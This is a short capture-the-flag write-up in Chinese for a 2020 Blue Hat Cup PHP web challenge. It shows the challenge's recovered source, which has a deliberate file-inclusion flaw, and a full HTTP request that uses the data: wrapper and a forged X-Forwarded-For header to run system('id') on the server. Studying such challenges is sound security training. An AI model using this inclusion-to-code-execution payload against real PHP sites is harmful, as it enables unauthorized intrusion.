[蓝帽杯2020]一个利用data伪协议和include,file_get_contents写shell的web题

蓝帽杯2020的一个web题目，是Insomni’hack 2019原题改的

首先是.index.php.swp下载源码，vim -r 恢复一下

<?php
    stream_wrapper_unregister('php');

    $seperate = bin2hex(rand(1,1000000));


    $mkdir = function($dir) {
        system('mkdir -p '.escapeshellarg($dir));
    };

    $mkdir('users/'.$seperate);
    chdir('users/'.$seperate);

    function getIp(){
        $ip = '';
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }elseif(isset($_SERVER['HTTP_CLIENT_IP'])){
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        }else{
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $ip_arr = explode(',', $ip);
		echo $ip_arr;
        return $ip_arr[0];
    }

    $curf = getIp();
    $curf = basename(str_replace('.','',$curf));
    $curf = basename(str_replace('-','',$curf));


    $mkdir($curf);
    chdir($curf);
    file_put_contents('res',print_r($_SERVER,true));
    chdir('..');
    $_GET['page']=str_replace('.','',$_GET['page']);
    if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
        include($_GET['page']);
    }

    chdir(__DIR__);
    system('rm -rf users/'.$seperate);


?>

这里就直接给 p3rh4ps 的总结和原题 write up 了，data伪协议在include和file_get_contents的骚操作 和 Phuck2 – Insomni’hack 2019

这里我用的payload如下，有时间再解释吧

GET /?page=data:;xx/res&s=<?=system("id");?> HTTP/1.1
Host: *****************************
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
X-Forwarded-For: data:;xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=170fce1d1512c6-0392054e0b14128-12666d4a-144000-170fce1d152245; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1592654089; __jsluid_h=f9c460e655586efbe9387f6edb185b14
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

结果如图